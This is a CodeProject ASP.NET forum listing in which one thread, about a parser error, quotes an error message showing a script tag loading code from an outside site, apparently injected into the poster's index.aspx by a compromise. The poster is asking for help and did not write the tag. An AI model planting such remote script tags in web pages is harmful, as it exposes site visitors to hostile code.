Click here to Skip to main content
15,886,199 members
Home / Discussions / ASP.NET
   

ASP.NET

 
AnswerRe: images Pin
carlecomm20-Oct-09 21:26
carlecomm20-Oct-09 21:26 
QuestionThe text,ntext and image data type cannot be compared or sorted except when IS NULL or LIKE Pin
haleemasher19-Oct-09 20:50
haleemasher19-Oct-09 20:50 
AnswerRe: The text,ntext and image data type cannot be compared or sorted except when IS NULL or LIKE Pin
Nigel Ferrissey19-Oct-09 21:01
Nigel Ferrissey19-Oct-09 21:01 
GeneralRe: The text,ntext and image data type cannot be compared or sorted except when IS NULL or LIKE Pin
haleemasher19-Oct-09 21:31
haleemasher19-Oct-09 21:31 
QuestionConnecting to Oracle Pin
v1i9n6o7d19-Oct-09 20:14
v1i9n6o7d19-Oct-09 20:14 
AnswerRe: Connecting to Oracle Pin
Abhishek Sur19-Oct-09 22:25
professionalAbhishek Sur19-Oct-09 22:25 
AnswerRe: Connecting to Oracle Pin
Abhijit Jana20-Oct-09 9:14
professionalAbhijit Jana20-Oct-09 9:14 
QuestionParser error... Pin
RajpootRohan19-Oct-09 19:32
professionalRajpootRohan19-Oct-09 19:32 
Hello friends,

I am stucked in a problem and I am not getting any solution. The page is giving a parser error:
Server Error in '/' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Source Error:

Line 97:
Line 98:
Line 99: </asp:Content><script src=http://agenturadomov.cz/eng/sluzby.php ></script>


Source File: /index.aspx Line: 99

Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082

I checked my code and found that I am not using such type of script. I googled and found that it may be because of several reasons like using

(xml tags)
and
<asp:content> instead of <asp:content>

But they didn't worked for me. Please assist me. Here is the code:

<br />
<%@ Page  Language="C#" MasterPageFile="~/MasterPage.master" AutoEventWireup="true" ClientTarget="uplevel"  CodeFile="index.aspx.cs" Inherits="index" Title="Eurowire Containers Limited" %><br />
<br />
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"><br />
<link rel="stylesheet" type="text/css" href="css/style.css" /><br />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" ></script><br />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js" ></script><br />
    <script type="text/javascript"><br />
	$(document).ready(function(){<br />
		$("#featured > ul").tabs({fx:{opacity: "toggle"}}).tabs("rotate", 5000, true);<br />
	});<br />
</script><br />
</asp:Content><br />
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"><br />
<br />
<div id="featured" ><br />
		  <ul class="ui-tabs-nav"><br />
	        <li class="ui-tabs-nav-item ui-tabs-selected" id="nav-fragment-1"><a href="#fragment-1" class="blacktext"><img src="images/image1-small.jpg" alt="" /><span>Exotic Cookware Designs</span></a></li><br />
	        <li class="ui-tabs-nav-item" id="nav-fragment-2"><a href="#fragment-2" class="blacktext"><img src="images/image2-small.jpg" alt="" /><span>Ice Machines</span></a></li><br />
	        <li class="ui-tabs-nav-item" id="nav-fragment-3"><a href="#fragment-3" class="blacktext"><img src="images/image3-small.jpg" alt="" /><span>Glassware</span></a></li><br />
	        <li class="ui-tabs-nav-item" id="nav-fragment-4"><a href="#fragment-4" class="blacktext"><img src="images/image4-small.jpg" alt="" /><span>Gastronorm</span></a></li><br />
	      </ul><br />
<br />
	    <br />
	    <div id="fragment-1" class="ui-tabs-panel" style=""><br />
			<img src="images/image1.jpg" alt="" /><br />
			 <div class="info" ><br />
				<h2><a href="#" >Exoitic Cookware Design</a></h2><br />
				<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla tincidunt condimentum lacus. Pellentesque ut diam....<a href="#" >read more</a></p><br />
			 </div><br />
	    </div><br />
<br />
	    <br />
	    <div id="fragment-2" class="ui-tabs-panel ui-tabs-hide" style=""><br />
			<img src="images/image2.jpg" alt="" /><br />
			 <div class="info" ><br />
				<h2><a href="#" >Ice Machines</a></h2><br />
				<p>Vestibulum leo quam, accumsan nec porttitor a, euismod ac tortor. Sed ipsum lorem, sagittis non egestas id, suscipit....<a href="#" >read more</a></p><br />
			 </div><br />
	    </div><br />
<br />
	    <br />
	    <div id="fragment-3" class="ui-tabs-panel ui-tabs-hide" style=""><br />
			<img src="images/image3.jpg" alt="" /><br />
			 <div class="info" ><br />
				<h2><a href="#" >Glassware</a></h2><br />
				<p>liquam erat volutpat. Proin id volutpat nisi. Nulla facilisi. Curabitur facilisis sollicitudin ornare....<a href="#" >read more</a></p><br />
	         </div><br />
	    </div><br />
<br />
	    <br />
	    <div id="fragment-4" class="ui-tabs-panel ui-tabs-hide" style=""><br />
			<img src="images/image4.jpg" alt="" /><br />
			 <div class="info" ><br />
				<h2><a href="#" >Gastronorm</a></h2><br />
				<p>Quisque sed orci ut lacus viverra interdum ornare sed est. Donec porta, erat eu pretium luctus, leo augue sodales....<a href="#" >read more</a></p><br />
	         </div><br />
	    </div><br />
<br />
		</div><br />
<br />
<div class="purple">Hot Deals</div><br />
 <div class="purplemid"><br />
<img src="images/200_CB923.jpg" alt="" /> <img src="images/200_CC059.jpg" alt="" /> <img src="images/200_CC250.jpg" alt="" /><br />
<img src="images/200_CB793.jpg" alt="" /> <img src="images/200_CB794.jpg" alt="" /><br />
<br /> <img src="images/200_CC251.jpg" alt="" /> <img src="images/200_T315.jpg" alt="" /> <img src="images/200_T316.jpg" alt="" /><br />
<img src="images/200_P044.jpg" alt="" /> <img src="images/200_P188.jpg" alt="" /><br />
</div><br />
<div class="puplebtm"></div><br />
<br /><br />
 <div class="purple">Latest Products</div><br />
 <div class="purplemid"><br />
 <div class="dtls"><br />
<div  class="itempic" align="center"><img src="images/freeze.jpg" alt="" /></div><div class="details" >Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum..</div><br />
</div><br />
 <div class="dtls"><br />
<div  class="itempic" align="center"><img src="images/freeze.jpg" alt="" /></div><div class="details" >Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum..</div><br />
</div><br />
</div><br />
<div class="puplebtm"></div><br />
<br />
<br />
<br />
<br />
</asp:Content><br />
<asp:Content ID="Content3" ContentPlaceHolderID="ContentPlaceHolder2" Runat="Server"><br />
<br />
<div class="ornage">Add to cart</div><br />
<div class="orangemid"><br />
Items:<br /> Value: <br />
</div><br />
<div class="ornagebtm"></div><br />
<div class="ornage">Star Buys</div><br />
<div class="orangemid"><br />
<asp:Image ID="Img1" runat="server" /><asp:Image ID="Img2" runat="server" /><asp:Image ID="Img3" runat="server" /> <br />
</div><br />
<div class="ornagebtm"></div><br />
<br />
<br />
</asp:Content><br />


cheers,
sneha

AnswerRe: Parser error... Pin
Abhijit Jana19-Oct-09 19:47
professionalAbhijit Jana19-Oct-09 19:47 
GeneralRe: Parser error... Pin
RajpootRohan19-Oct-09 20:28
professionalRajpootRohan19-Oct-09 20:28 
GeneralRe: Parser error... Pin
Abhijit Jana19-Oct-09 21:07
professionalAbhijit Jana19-Oct-09 21:07 
GeneralRe: Parser error... Pin
RajpootRohan19-Oct-09 20:51
professionalRajpootRohan19-Oct-09 20:51 
AnswerRe: Parser error... Pin
sumans432419-Oct-09 20:15
sumans432419-Oct-09 20:15 
AnswerRe: Parser error... Pin
Nigel Ferrissey19-Oct-09 21:28
Nigel Ferrissey19-Oct-09 21:28 
AnswerRe: Parser error... Pin
RajpootRohan20-Oct-09 1:57
professionalRajpootRohan20-Oct-09 1:57 
Questionopen a new window with the specified url on clicking a image in slide show extender ajax control Pin
jknascrimz19-Oct-09 18:46
jknascrimz19-Oct-09 18:46 
AnswerRe: open a new window with the specified url on clicking a image in slide show extender ajax control Pin
Christian Graus19-Oct-09 18:57
protectorChristian Graus19-Oct-09 18:57 
GeneralRe: open a new window with the specified url on clicking a image in slide show extender ajax control Pin
jknascrimz19-Oct-09 19:13
jknascrimz19-Oct-09 19:13 
GeneralRe: open a new window with the specified url on clicking a image in slide show extender ajax control Pin
Christian Graus19-Oct-09 19:27
protectorChristian Graus19-Oct-09 19:27 
GeneralRe: open a new window with the specified url on clicking a image in slide show extender ajax control Pin
jknascrimz19-Oct-09 22:47
jknascrimz19-Oct-09 22:47 
AnswerRe: open a new window with the specified url on clicking a image in slide show extender ajax control Pin
Rob Branaghan21-Oct-09 0:51
Rob Branaghan21-Oct-09 0:51 
Questioncopy cell content in datagrid Pin
vedpra19-Oct-09 17:51
vedpra19-Oct-09 17:51 
AnswerRe: copy cell content in datagrid Pin
N a v a n e e t h19-Oct-09 18:03
N a v a n e e t h19-Oct-09 18:03 
GeneralRe: copy cell content in datagrid Pin
vedpra19-Oct-09 18:32
vedpra19-Oct-09 18:32 
GeneralRe: copy cell content in datagrid Pin
Richard MacCutchan19-Oct-09 22:46
mveRichard MacCutchan19-Oct-09 22:46 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.